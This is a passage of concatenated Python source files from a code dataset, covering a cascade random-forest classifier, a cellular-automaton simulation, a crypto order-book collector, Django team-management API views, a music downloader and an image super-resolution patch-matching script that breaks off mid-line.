'n_cascadeRF')\n cas_list, _, cas_OOB = self.get_cascade_estimators()\n for irf in range(n_cascadeRF):\n for i, cas in enumerate(cas_list):\n if cas_OOB[cas]:\n delattr(self, '_cas%s_%d_%d'%(cas, self.n_layer, irf))\n elif not cas_OOB[cas] and irf==0:\n delattr(self, '_cas%s_%d_%d'%(cas, self.n_layer, irf))\n self.n_layer -= 1\n\n elif y is None:\n at_layer = 1\n prf_crf_pred_ref = self._cascade_layer(X, layer=at_layer)\n while at_layer < getattr(self, 'n_layer'):\n at_layer += 1\n feat_arr = self._create_feat_arr(X, prf_crf_pred_ref)\n prf_crf_pred_ref = self._cascade_layer(feat_arr, layer=at_layer)\n\n return prf_crf_pred_ref\n\n def _cascade_layer(self, X, y=None, layer=0):\n \"\"\" Cascade layer containing Random Forest or/and orther estimators .\n If y is not None the layer is trained.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param y: np.array (default=None)\n Target values. If 'None' perform training.\n\n :param layer: int (default=0)\n Layer indice. Used to call the previously trained layer.\n\n :return: list\n List containing the prediction probabilities for all samples.\n \"\"\"\n \n n_cascadeRF = getattr(self, 'n_cascadeRF')\n \n cas_list, cas_estimators, cas_OOB = self.get_cascade_estimators()\n prf_crf_pred = []\n if y is not None:\n print('Adding/Training Layer, n_layer={}'.format(self.n_layer))\n \n for irf in range(n_cascadeRF):\n for i, cas in enumerate(cas_list):\n estimator = cas_estimators[cas]\n \n if cas_OOB[cas]:\n estimator.fit(X, y)\n setattr(self, '_cas%s_%d_%d'%(cas, self.n_layer, irf), copy.deepcopy(estimator))\n prf_crf_pred.append(estimator.oob_decision_function_)\n elif not cas_OOB[cas] and irf==0:\n estimator_cv = self.kfold_wrapper(estimator, est_fun='class', n_folds=self.n_cascade_cv, \n fold_method=self.cv_method, val_size=self.cv_cascade_valSize)\n estimator_cv.fit(X, y)\n setattr(self, '_cas%s_%d_%d'%(cas, self.n_layer, irf), copy.deepcopy(estimator_cv.estimator))\n prf_crf_pred.append(estimator_cv.cv_pred_prob)\n \n elif y is None:\n for irf in range(n_cascadeRF):\n for i, cas in enumerate(cas_list):\n if cas_OOB[cas]:\n estimator = getattr(self, '_cas%s_%d_%d'%(cas, layer, irf))\n prf_crf_pred.append( estimator.predict_proba(X) )\n elif not cas_OOB[cas] and irf==0:\n estimator = getattr(self, '_cas%s_%d_%d'%(cas, layer, irf))\n prf_crf_pred.append( estimator.predict_proba(X) )\n \n return prf_crf_pred\n\n def _cascade_evaluation(self, X_test, y_test):\n \"\"\" Evaluate the accuracy of the cascade using X and y.\n\n :param X_test: np.array\n Array containing the test input samples.\n Must be of the same shape as training data.\n\n :param y_test: np.array\n Test target values.\n\n :return: float\n the cascade accuracy.\n \"\"\"\n casc_pred_prob = np.mean(self.cascade_forest(X_test), axis=0)\n casc_pred = np.argmax(casc_pred_prob, axis=1)\n casc_accuracy = self.scoring(y_test, casc_pred)\n print('Layer validation accuracy = {}'.format(casc_accuracy))\n\n return casc_accuracy\n\n def _create_feat_arr(self, X, prf_crf_pred):\n \"\"\" Concatenate the original feature vector with the predicition probabilities\n of a cascade layer.\n\n :param X: np.array\n Array containing the input samples.\n Must be of shape [n_samples, data] where data is a 1D array.\n\n :param prf_crf_pred: list\n Prediction probabilities by a cascade layer for X.\n\n :return: np.array\n Concatenation of X and the predicted probabilities.\n To be used for the next layer in a cascade forest.\n \"\"\"\n swap_pred = np.swapaxes(prf_crf_pred, 0, 1)\n add_feat = swap_pred.reshape([np.shape(X)[0], -1])\n feat_arr = np.concatenate([add_feat, X], axis=1)\n\n return feat_arr\n","sub_path":"gcForestClassifier.py","file_name":"gcForestClassifier.py","file_ext":"py","file_size_in_byte":22403,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"468683988","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 11 13:22:59 2016\n\nCellular Automata: More Complicated Tea Leaf Dispersion (oriented, hexagonal)\nUsing CellLab\n\n@author: Katherine\n\"\"\"\n\nimport time\nimport matplotlib\nfrom numpy import where\nfrom landlab import HexModelGrid\nfrom landlab.ca.celllab_cts import Transition, CAPlotter\nfrom landlab.ca.oriented_hex_cts import OrientedHexCTS\n\ndef setup_transition_list():\n \"\"\"\n Creates and returns a list of Transition() objects to represent state\n transitions for an unbiased random walk.\n\n Parameters\n ----------\n (none)\n\n Returns\n -------\n xn_list : list of Transition objects\n List of objects that encode information about the link-state transitions.\n\n Notes\n -----\n State 0 represents fluid and state 1 represents a particle (such as a\n sediment grain, tea leaf, or solute molecule).\n\n The states and transitions are as follows:\n\n Pair state (orientation) Transition to Process Rate (cells/s)\n ======================== ============= ======= ==============\n 0 (0-0) (none) - -\n 1 (0-1) (0) 2 (1-0) (0) down motion 30.0\n 2 (1-0) (0) 1 (0-1) (0) up motion 10.0\n 3 (0-1) (1) 4 (1-0) (1) leftward down motion 30.0\n 4 (1-0) (1) 3 (0-1) (1) rightward up motion 10.0\n 5 (0-1) (2) 6 (1-0) (2) leftward up motion 10.0\n 6 (1-0) (2) 5 (0-1) (2) righward down motion 30.0\n 7 (1-1) (none) - -\n\n \"\"\"\n\n # Create an empty transition list\n xn_list = []\n\n # Append two transitions to the list.\n # Note that the arguments to the Transition() object constructor are:\n # - Tuple representing starting pair state\n # (left/bottom cell, right/top cell, orientation)\n # - Tuple representing new pair state\n # (left/bottom cell, right/top cell, orientation)\n # - Transition rate (cells per time step, in this case 1 sec)\n # - Name for transition\n xn_list.append( Transition((0,1,0), (1,0,0), 10., 'down motion') )\n xn_list.append( Transition((1,0,0), (0,1,0), 5., 'up motion') )\n xn_list.append( Transition((0,1,1), (1,0,1), 10., 'leftward down motion'))\n xn_list.append( Transition((1,0,1), (0,1,1), 5., 'rightward up motion'))\n xn_list.append( Transition((0,1,2), (1,0,2), 5., 'leftward up motion'))\n xn_list.append( Transition((1,0,2), (0,1,2), 10., 'rightward down motion')) \n return xn_list\n \n \ndef main():\n # INITIALIZE\n # User-defined parameters\n nr = 80 # number of rows in grid\n nc = 50 # number of columns in grid\n plot_interval = 0.5 # time interval for plotting, sec\n run_duration = 20.0 # duration of run, sec\n report_interval = 10.0 # report interval, in real-time seconds\n\n # Remember the clock time, and calculate when we next want to report\n # progress.\n current_real_time = time.time()\n next_report = current_real_time + report_interval\n\n # Create grid\n mg = HexModelGrid(nr, nc, 1.0)\n\n # Make the boundaries be walls\n# mg.set_closed_boundaries_at_grid_edges(True, True, True, True)<--I am not sure what the equivalent is for hexgrid\n\n #Create a node-state dictionary\n ns_dict = { 0 : 'fluid', 1 : 'particle' }\n\n #Create the transition list\n xn_list = setup_transition_list()\n\n # Create the node-state array and attach it to the grid\n node_state_grid = mg.add_zeros('node', 'node_state_map', dtype=int)\n\n # Initialize the node-state array: here, the initial condition is a pile of\n # resting grains at the bottom of a container.\n bottom_rows = where(mg.node_y<0.1*nr)[0]\n node_state_grid[bottom_rows] = 1\n\n # For visual display purposes, set all boundary nodes to fluid\n node_state_grid[mg.closed_boundary_nodes] = 0\n\n # Create the CA model\n ca = OrientedHexCTS(mg, ns_dict, xn_list, node_state_grid)\n\n # Set up colors for plotting\n grain = '#5F594D'\n fluid = '#D0E4F2'\n clist = [fluid,grain]\n my_cmap = matplotlib.colors.ListedColormap(clist)\n\n # Create a CAPlotter object for handling screen display\n ca_plotter = CAPlotter(ca, cmap=my_cmap)\n\n # Plot the initial grid\n ca_plotter.update_plot()\n\n # RUN\n current_time = 0.0\n while current_time < run_duration:\n\n # Once in a while, print out simulation real time to let the user\n # know that the sim is running ok\n current_real_time = time.time()\n if current_real_time >= next_report:\n print('Current simulation time '+str(current_time)+' \\\n ('+str(int(100*current_time/run_duration))+'%)')\n next_report = current_real_time + report_interval\n\n # Run the model forward in time until the next output step\n ca.run(current_time+plot_interval, ca.node_state, plot_each_transition=False)\n current_time += plot_interval\n\n # Plot the current grid\n ca_plotter.update_plot()\n \n ca_plotter.finalize()\n\n\nmain()","sub_path":"Git_Add_Scripts/TeaLeaf_Dispersion_Gravity_Hex.py","file_name":"TeaLeaf_Dispersion_Gravity_Hex.py","file_ext":"py","file_size_in_byte":5231,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"14424401","text":"#!/usr/local/bin/python2.7\nfrom argparse import ArgumentParser\nfrom sys import exit, stderr, stdout, path\nfrom os import system\nfrom python_util import print_args\n\nfrom ScoreTable import *\nfrom ScoreFunction import *\nfrom Pose import *\nfrom FragIdxPose import *\nfrom TrajectoryTracker import *\n\n \n\nif __name__=='__main__':\n parser = ArgumentParser()\n parser.add_argument(\"-p\", \"--selected_frags_path\", required=True, help=\"\")\n\n parser.add_argument(\"-d\", \"--density_scorefile\", help=\"\")\n parser.add_argument(\"-o\", \"--overlap_scorefile\", help=\"\")\n parser.add_argument(\"-n\", \"--nonoverlap_scorefile\", help=\"\")\n\n parser.add_argument(\"-dw\", \"--density_score_wt\", default=1.0, type=float, help=\"default=1.0\")\n parser.add_argument(\"-ow\", \"--overlap_score_wt\", default=1.0, type=float, help=\"default=1.0\")\n parser.add_argument(\"-cw\", \"--closab_score_wt\", default=1.0, type=float, help=\"default=1.0\")\n parser.add_argument(\"-sw\", \"--clash_score_wt\", default=100.0, type=float, help=\"default=100.0\")\n\n parser.add_argument(\"-e\", \"--null_frag_score\", default=-200.0, type=float, help=\"default=-200\")\n\n parser.add_argument(\"--nstruct\", default=1, type=int, help=\"default=1\")\n args = parser.parse_args()\n wts_used = print_args( args ) \n out = open(\"lowrmsd.decomposed.log\", \"w\")\n out.write( wts_used )\n out.close()\n\n # score table\n scoretable = ScoreTable( args.selected_frags_path )\n scoretable.score_files_reader( args.density_scorefile, args.overlap_scorefile, args.nonoverlap_scorefile )\n\n # scorefxn\n wts = Weights( args.density_score_wt, args.overlap_score_wt, args.closab_score_wt, args.clash_score_wt )\n scorefxn = ScoreFunction( scoretable, wts, args.null_frag_score )\n\n # initialize with lowrmsd frags\n fragidx_pose = FragIdxPose() # doesn't have any method in it.\n fragidx_pose.initialization( scorefxn.get_density_score_dict(), \"lowrmsd\" ) # default initialize by random\n\n # store the lowrmsd_frags pose into scorefxn\n scorefxn.update_pose( fragidx_pose ) \n\n residual_pose = scorefxn.residualize_pose() # residual_pose will be filled with Residue objects, which contains decomposed scores for each residue\n\n # dump pose\n tracker = TrajectoryTracker()\n tracker.save( 1, residual_pose ) # 1 is a arbitrary number\n tracker.dump_pickle( \"lowrmsd\" )\n\n residual_pose.show_state( \"lowrmsd\", True ) # True for verbose showing all residues states\n system(\"/work/wangyr/scripts/cryoem_util/decompose_score_terms.py lowrmsd.pickle >> lowrmsd.decomposed.log\")\n \n \n","sub_path":"denovo_utils/lowest_rmsd_pose.py","file_name":"lowest_rmsd_pose.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"527292383","text":"from serial_monitor import serial_monitor\nfrom current_time import current_time\nfrom filecontrol import filecontrol\nfrom database import database\nimport serial\nimport time\nimport mysql.connector\nimport os\n\ncount = 0\nuserid = str(1)\nactive = True\n\ntime.sleep(2)\n\ncurrent_time = current_time()\nhour = current_time.get_hour()\n\nsm = serial_monitor()\n\nfilecontrol = filecontrol()\n\ndb = database()\ndb.connect()\n\n# Read and record the data\nwhile active:\n sm.read(True)\n distance = str(sm.get_distance())\n ldr = str(sm.get_ldr())\n valid = int(sm.get_valid())\n\n if int(distance) != 0 and int(distance) < 20 and valid == 1:\n sm.read(False)\n print(\"CAPTURE\")\n os.system('python capture.py')\n sm.read(True)\n \n count += 1\n time.sleep(0.1) # wait (sleep) 0.1 seconds\n \n if count % 2 == 0 and count != 0:\n col_headers = ['sensor_values', 'distance', 'ldr', 'userid']\n col_values = [distance, ldr, userid]\n\n db.insert(col_headers, col_values)\n\n current_hour = current_time.get_hour()\n\n if current_hour > hour: #previous current_hour > hour\n filecontrol.file_check()\n hour = current_hour","sub_path":"hardware/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"219431023","text":"import time\nimport boto3\nimport json\nimport ast\nfrom binance.client import Client\n\n# Instantiate resources\ntry:\n boto_session = boto3.Session(profile_name='loidsig')\nexcept:\n boto_session = boto3.Session()\ns3_resource = boto_session.resource('s3')\ns3_bucket = 'loidsig-crypto'\n\nsm_client = boto_session.client(\n service_name='secretsmanager',\n region_name='us-east-1',\n endpoint_url='https://secretsmanager.us-east-1.amazonaws.com'\n)\nget_secret_value_response = sm_client.get_secret_value(SecretId='Loidsig_CPM_Binance')\nkey, value = ast.literal_eval(get_secret_value_response['SecretString']).popitem()\nbnb = Client(key, value)\n\ndef main(event, context):\n time.sleep(2) # eth seems to be collected too early. \n coins = (\n 'ETHUSDT',\n 'BTCUSDT',\n 'ETHBTC',\n 'BNBUSDT',\n 'LTCUSDT',\n 'BCHABCUSDT',\n 'NEOUSDT',\n 'ETCUSDT',\n 'EOSUSDT',\n 'TRXUSDT',\n 'QTUMUSDT',\n 'XRPUSDT',\n 'TRXETH',\n 'XRPETH',\n 'NEOETH',\n 'TUSDBNB',\n 'TUSDBTC',\n 'TUSDETH'\n )\n for coin_pair in coins:\n json_message, unix_timestamp = get_orderbook_message(coin_pair)\n message_to_s3(json_message, coin_pair, unix_timestamp)\n message_to_queue(json_message)\n\ndef get_orderbook_message(coin_pair):\n unix_timestamp = int(time.time())\n api_tries = 0\n while api_tries < 2:\n try:\n order_book = bnb.get_order_book(symbol=coin_pair, limit=1000)\n break\n except Exception as e:\n print(f\"Error! {e}\")\n api_tries += 1\n time.sleep(5)\n # Bids\n orderbook_bids = order_book['bids']\n # Asks\n orderbook_asks = order_book['asks']\n # Build message\n message = {}\n message['exchange'] = 'binance'\n message['coin_pair'] = coin_pair.lower().replace('-', '')\n message['unix_timestamp'] = unix_timestamp\n message['bids'] = orderbook_bids\n message['asks'] = orderbook_asks\n message_json = json.dumps(message)\n return message_json, unix_timestamp\n\ndef message_to_s3(json, coin_pair, timestamp):\n file_name = f\"{timestamp}.json\"\n file_path = f\"binance/historic_orderbook_raw/{coin_pair}/{file_name}\"\n s3_resource.Object(s3_bucket, file_path).put(Body=json)\n\ndef message_to_queue(message):\n # Send message\n sqs_resource = boto_session.resource('sqs', region_name='us-east-1')\n sqs_queue = sqs_resource.get_queue_by_name(QueueName='raw_orderbook_events')\n response = sqs_queue.send_message(MessageBody=message)\n print(response.get('MessageId'))\n print(response.get('MD5OfMessageBody'))\n\nif __name__ == '__main__':\n main(None, None)","sub_path":"src/data_pipeline/orderbook/orderbook_events_service/binance_orderbook_events.py","file_name":"binance_orderbook_events.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"453357029","text":"import cv2\nimport os\n\nfs = os.listdir('/home/nagalab/soutarou/images')\nfor fn in fs:\n img = cv2.imread('/home/nagalab/soutarou/images/' + fn)\n gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n cascade = cv2.CascadeClassifier(\"lbpcascade_animeface.xml\")\n face_list = cascade.detectMultiScale(gray, 1.1,minSize=(150,150))\n if len(face_list) > 0:\n for x,y,w,h in face_list:\n face_cut = img[y:y+h, x:x+w]\n cv2.imwrite('/home/nagalab/soutarou/face/' + fn,face_cut)\n\n","sub_path":"conversion.py","file_name":"conversion.py","file_ext":"py","file_size_in_byte":496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"616077168","text":"import requests\r\nimport json\r\nimport os\r\n\r\nclass KuWo(object):\r\n\r\n def __init__(self):\r\n\r\n self.headers = {\r\n \"Cookie\": \"Hm_lvt_cdb524f42f0ce19b169a8071123a4797=1613969685; _ga=GA1.2.373368830.1613969685; _gid=GA1.2.1071113528.1613969685; Hm_lpvt_cdb524f42f0ce19b169a8071123a4797=1613970806; kw_token=21O69LPAXV8\",\r\n \"csrf\": \"21O69LPAXV8\",\r\n \"Host\": \"www.kuwo.cn\",\r\n \"Referer\": \"http://www.kuwo.cn\",\r\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36\"\r\n }\r\n\r\n def get_url(self,pn=1,rn=1):\r\n keyword = input(\"请输入需要下载的歌曲:\")\r\n return \"http://www.kuwo.cn/api/www/search/searchMusicBykeyWord?key=%s&pn=%s&rn=%s\" %(keyword,pn,rn)\r\n\r\n def parse_url(self,url):\r\n request = requests.get(url,headers=self.headers).text\r\n return request\r\n\r\n def get_song_url(self,request):\r\n result = json.loads(request)[\"data\"][\"list\"][0]\r\n song_name = result[\"name\"]\r\n rid = result[\"rid\"]\r\n\r\n purl = \"http://www.kuwo.cn/url?rid=%s&type=convert_url3&br=128kmp3\" %(rid,)\r\n song_url = json.loads(self.parse_url(purl))[\"url\"]\r\n return song_name,song_url\r\n\r\n def download(self,song_name,song_url):\r\n if not os.path.exists('music'):\r\n os.mkdir('music')\r\n with open('music/%s.mp3' %(song_name,),'wb') as f:\r\n music_mp3 = requests.get(song_url,timeout = 5).content\r\n f.write(music_mp3)\r\n print(\"success\")\r\n\r\n def run(self):\r\n #1 准备url地址\r\n url = self.get_url()\r\n #2 发送请求,获取响应\r\n res = self.parse_url(url)\r\n #3 获取单曲url地址\r\n #4 发送请求,获取响应,解析出歌曲文件地址\r\n song_name,song_url = self.get_song_url(res)\r\n #5 保存为MP3文件\r\n self.download(song_name,song_url)\r\n \r\nif __name__ == '__main__':\r\n kw = KuWo()\r\n kw.run()","sub_path":"KuWo_music.py","file_name":"KuWo_music.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"306481620","text":"import fibonacci\nimport time\n\ndef summ():\n\n t1 = time.time()\n sum = 0\n for i in range(100000):\n sum += fibonacci.cycle(i)\n print(sum)\n print(len(str(sum)))\n print(time.time() - t1)\n\nsumm()","sub_path":"summOf.py","file_name":"summOf.py","file_ext":"py","file_size_in_byte":213,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"93449227","text":"from django.contrib.auth import get_user_model\nfrom django.shortcuts import get_object_or_404\n\nfrom rest_framework import exceptions, generics, permissions\n\nfrom .models import Invitation, LicenceAcceptance, LicenceVersion, Team, TeamMember\nfrom .permissions import (\n IsTeamAdminForUnsafePermission,\n IsTeamMemberPermission,\n)\nfrom .serializers import (\n InvitationSerializer,\n LicenceAcceptanceSerializer,\n TeamSerializer,\n TeamMemberSerializer,\n UserSerializer,\n)\nfrom .helpers import get_teams_for_user\n\nUser = get_user_model()\n\n\nclass TeamDetailView(generics.RetrieveUpdateAPIView):\n \"\"\"\n API detail endpoint for Team.\n \"\"\"\n\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n serializer_class = TeamSerializer\n lookup_url_kwarg = (\n \"team_id\" # using team_id keeps view compatible with team permission classes\n )\n\n def get_queryset(self):\n return get_teams_for_user(self.request.user)\n\n\nclass TeamMemberListView(generics.ListAPIView):\n \"\"\"\n API list endpoint for TeamMember.\n \"\"\"\n\n serializer_class = TeamMemberSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n\n def get_queryset(self):\n team_id = self.kwargs.get(\"team_id\")\n teams = get_teams_for_user(self.request.user, team=team_id)\n return TeamMember.objects.filter(team__in=teams)\n\n\nclass TeamMemberDetailView(generics.RetrieveDestroyAPIView):\n \"\"\"\n API detail endpoint for TeamMember.\n \"\"\"\n\n serializer_class = TeamMemberSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n\n def get_queryset(self):\n teams = get_teams_for_user(self.request.user)\n return TeamMember.objects.filter(team__in=teams)\n\n def delete(self, request, team_id, pk):\n if get_object_or_404(TeamMember, pk=pk).user == request.user:\n # Don't allow a team member to delete themselves\n raise exceptions.MethodNotAllowed(\"Own team membership cannot be deleted.\")\n return super().delete(self, request, team_id, pk)\n\n\nclass InvitationListView(generics.ListCreateAPIView):\n \"\"\"\n API list endpoint for Invitation.\n \"\"\"\n\n serializer_class = InvitationSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n\n def get_queryset(self):\n team_id = self.kwargs.get(\"team_id\")\n teams = get_teams_for_user(self.request.user, team=team_id)\n return Invitation.objects.filter(to_team__in=teams, accepted=False)\n\n def perform_create(self, serializer):\n \"\"\"\n Set to_team from url resolver\n Send email after creation\n \"\"\"\n team = get_object_or_404(Team, pk=self.request.resolver_match.kwargs[\"team_id\"])\n invitation = serializer.save(to_team=team)\n invitation.send_invitation_email()\n\n\nclass InvitationDetailView(generics.RetrieveDestroyAPIView):\n \"\"\"\n API detail endpoint for Invitation.\n \"\"\"\n\n serializer_class = InvitationSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n queryset = Invitation.objects.all()\n\n def get_object(self):\n obj = get_object_or_404(self.get_queryset(), pk=self.kwargs[\"pk\"])\n self.check_object_permissions(self.request, obj)\n if self.request.method == \"DELETE\" and obj.accepted:\n # Don't allow accepted invitations to be deleted\n raise exceptions.MethodNotAllowed(\"Accepted invitations cannot be deleted.\")\n return obj\n\n\nclass OwnUserDetailView(generics.RetrieveUpdateAPIView):\n \"\"\"\n API detail endpoint for authenticated/own User.\n \"\"\"\n\n serializer_class = UserSerializer\n queryset = User.objects.all()\n\n def get_object(self):\n return self.request.user\n\n\nclass LicenceAcceptanceListView(generics.ListCreateAPIView):\n \"\"\"\n API detail endpoint for LicenceAcceptance.\n \"\"\"\n\n serializer_class = LicenceAcceptanceSerializer\n permission_classes = [\n permissions.IsAuthenticated,\n IsTeamMemberPermission,\n IsTeamAdminForUnsafePermission,\n ]\n\n def get_queryset(self):\n team_id = self.kwargs.get(\"team_id\")\n teams = get_teams_for_user(self.request.user, team=team_id)\n return LicenceAcceptance.objects.filter(team__in=teams)\n\n def perform_create(self, serializer):\n \"\"\"\n Set team from url resolver, user from request\n Send email after creation\n \"\"\"\n team = get_object_or_404(Team, pk=self.request.resolver_match.kwargs[\"team_id\"])\n try:\n licence_version = LicenceVersion.objects.current()\n except LicenceVersion.DoesNotExist:\n raise exceptions.APIException(\n code=500, detail=\"No current Licence version exists.\"\n )\n\n serializer.save(\n licence_version=licence_version, team=team, user=self.request.user\n )\n","sub_path":"brynweb/userdb/api_views.py","file_name":"api_views.py","file_ext":"py","file_size_in_byte":5261,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"256820587","text":"import tensorflow as tf\nfrom SRNTT.tensorlayer import *\nimport numpy as np\nfrom glob import glob\nfrom os.path import exists, join, split, realpath, dirname\nfrom os import makedirs\nfrom SRNTT.model import *\nfrom SRNTT.vgg19 import *\nfrom SRNTT.swap360 import *\nfrom scipy.misc import imread, imresize\nimport argparse\nimport csv\n\ntf.logging.set_verbosity(tf.logging.ERROR)\n\nparser = argparse.ArgumentParser('offline_patchMatch_textureSwap')\nparser.add_argument('--data_folder', type=str, default='data/train/CUFED', help='The dir of dataset: CUFED or DIV2K')\nargs = parser.parse_args()\n\ndata_folder = '/media/zy/55d6108f-5507-4552-977b-a5fbda209f8d/DocuClassLin/lsy/contextualLoss-master/move/new_2k/'\ninput_size_w = 240\ninput_size_h = 120\ninput_path = data_folder\n# 是否要去掉2_1?在比较特征时,是否需要先下采样再上采样?\n# matching_layer = ['relu3_1', 'relu2_1', 'relu1_1']\nmatching_layer = ['relu3_1', 'relu1_1']\ninput_files = sorted(glob(join(input_path, '*.jpg')))\nn_files = len(input_files)\nprint('长度:', n_files)\n\nvgg19_model_path = 'SRNTT/models/VGG19/imagenet-vgg-verydeep-19.mat'\ntf_input = tf.placeholder(dtype=tf.float32, shape=[1, input_size_h, input_size_w, 3])\nsrntt = SRNTT(vgg19_model_path=vgg19_model_path)\nnet_upscale, _ = srntt.model(tf_input / 127.5 - 1, is_train=False)\nnet_vgg19 = VGG19(model_path=vgg19_model_path)\nswaper = Swap()\n\n\ndef write_corr_list(row):\n path = \"corr_list_normalize.csv\"\n with open(path, 'a+') as f:\n csv_write = csv.writer(f)\n csv_write.writerow(row)\n\n\nconfig = tf.ConfigProto()\nconfig.gpu_options.allow_growth = True\nwith tf.Session(config=config) as sess:\n tf.global_variables_initializer().run()\n model_path = join(dirname(realpath(__file__)), 'SRNTT', 'models', 'SRNTT', 'upscale.npz')\n if files.load_and_assign_npz(\n sess=sess,\n name=model_path,\n network=net_upscale) is False:\n raise Exception('FAILED load %s' % model_path)\n else:\n print('SUCCESS load %s' % model_path)\n print_format = '%%0%dd/%%0%dd' % (len(str(n_files)), len(str(n_files)))\n corr_list = []\n csv_data_name = []\n i = 0\n # for i in range(n_files):\n with open('label_cut_full_wspsnr.csv', 'r') as csv_file:\n reader = csv.reader(csv_file)\n for row in reader:\n csv_data_name.append(row[0])\n print(\"csv文件数量\", len(csv_data_name))\n for item in csv_data_name:\n print(print_format % (i + 1, n_files))\n corr_list.append(item)\n img_path = os.path.join(data_folder, item)\n full_image = imread(img_path, mode='RGB')\n height = full_image.shape[0]\n width = full_image.shape[1]\n lr_top = np.concatenate((full_image[0:int(height / 4), 0:int(width / 2), :],\n full_image[0:int(height / 4), int(width / 2):width, :]), axis=0)\n lr_bottom = np.concatenate((full_image[int(3 * height / 4):height, 0:int(width / 2), :],\n full_image[int(3 * height / 4):height, int(width / 2):width, :]), axis=0)\n for cut_line in range(0, width, int(width / 10)):\n print(\"当前分割线:\", cut_line)\n img_left = full_image[:, 0:cut_line, :]\n img_right = full_image[:, cut_line:width, :]\n full_image_after_move = np.concatenate((img_right, img_left), axis=1)\n # 他们四个都是480*960\n lr_center = full_image_after_move[int(height / 4):int(3 * height / 4), 0:int(width / 2), :]\n # lr_top = np.concatenate((full_image[0:int(height / 4), 0:int(width / 2), :],\n # full_image[0:int(height / 4), int(width / 2):width, :]), axis=0)\n # lr_bottom = np.concatenate((full_image[int(3 * height / 4):height, 0:int(width / 2), :],\n # full_image[int(3 * height / 4):height, int(width / 2):width, :]), axis=0)\n ref = full_image_after_move[int(height / 4):int(3 * height / 4), int(width / 2):width, :]\n # imsave('center_%02d.png' % cut_line, lr_center)\n # imsave('top_%02d.png' % cut_line, lr_top)\n # imsave('bottom_%02d.png' % cut_line, lr_bottom)\n # imsave('ref_%02d.png' % cut_line, ref)\n\n # 低分辨率输入\n img_in_lr_center = imresize(lr_center, (input_size_h, input_size_w), interp='bicubic')\n img_in_lr_top = imresize(lr_top, (input_size_h, input_size_w), interp='bicubic')\n img_in_lr_bottom = imresize(lr_bottom, (input_size_h, input_size_w), interp='bicubic')\n # 原大小和缩小四倍的ref\n img_ref = imresize(ref, (input_size_h * 4, input_size_w * 4), interp='bicubic')\n img_ref_lr = imresize(img_ref, (input_size_h, input_size_w), interp='bicubic')\n # 网络插值得到的LR/ref(长宽各四倍)\n img_in_center_sr = (net_upscale.outputs.eval({tf_input: [img_in_lr_center]})[0] + 1) * 127.5\n img_in_top_sr = (net_upscale.outputs.eval({tf_input: [img_in_lr_top]})[0] + 1) * 127.5\n img_in_bottom_sr = (net_upscale.outputs.eval({tf_input: [img_in_lr_bottom]})[0] + 1) * 127.5\n img_ref_sr = (net_upscale.outputs.eval({tf_input: [img_ref_lr]})[0] + 1) * 127.5\n\n # get feature maps via VGG19\n # [1,40,40,256] [3,40,40,256] [1,40,40,256]\n # matching_layer的取值['relu3_1', 'relu2_1', 'relu1_1']\n # map_ref[0] [1,40,40,256] ; map_ref[1] [1,80,80,128] ; map_ref[2] [1,160,160,64]\n map_in_center_sr = net_vgg19.get_layer_output(sess=sess, feed_image=img_in_center_sr,\n layer_name=matching_layer)\n map_in_top_sr = net_vgg19.get_layer_output(sess=sess, feed_image=img_in_top_sr,\n layer_name=matching_layer)\n map_in_bottom_sr = net_vgg19.get_layer_output(sess=sess, feed_image=img_in_bottom_sr,\n layer_name=matching_layer)\n\n map_ref = net_vgg19.get_layer_output(sess=sess, feed_image=img_ref, layer_name=matching_layer[0])\n map_ref_sr = net_vgg19.get_layer_output(sess=sess, feed_image=img_ref_sr, layer_name=matching_layer)\n\n # patch matching and swapping\n # [2,80,80,128]\n # other_style = []\n # for m in map_ref[1:]:\n # other_style.append([m])\n\n other_condition = []\n for s in map_ref_sr[1:]:\n other_condition.append([s])\n\n other_center = []\n for n in map_in_center_sr[1:]:\n other_center.append([n])\n\n other_top = []\n for e in map_in_top_sr[1:]:\n other_top.append([e])\n\n other_bottom = []\n for r in map_in_bottom_sr[1:]:\n other_bottom.append([r])\n\n # print(\"shape of map_in_sr\", len(map_in_sr))\n # print(\"shape of map_ref\", len(map_ref))\n # print(\"shape of map_ref[0]\", len(map_ref[0]))\n # print(\"shape of map_ref_sr\", len(map_ref_sr))\n # print(\"shape of other_style\", len(other_style))\n # print(\"shape of lr_center\", lr_center.shape)\n # print(\"shape of lr_top\", lr_top.shape)\n # print(\"shape of lr_bottom\", lr_bottom.shape)\n # print(\"shape of ref\", ref.shape)\n # print(\"shape of map_in_sr\", map_in_sr.shape)\n # print(\"shape of map_ref[0]\", 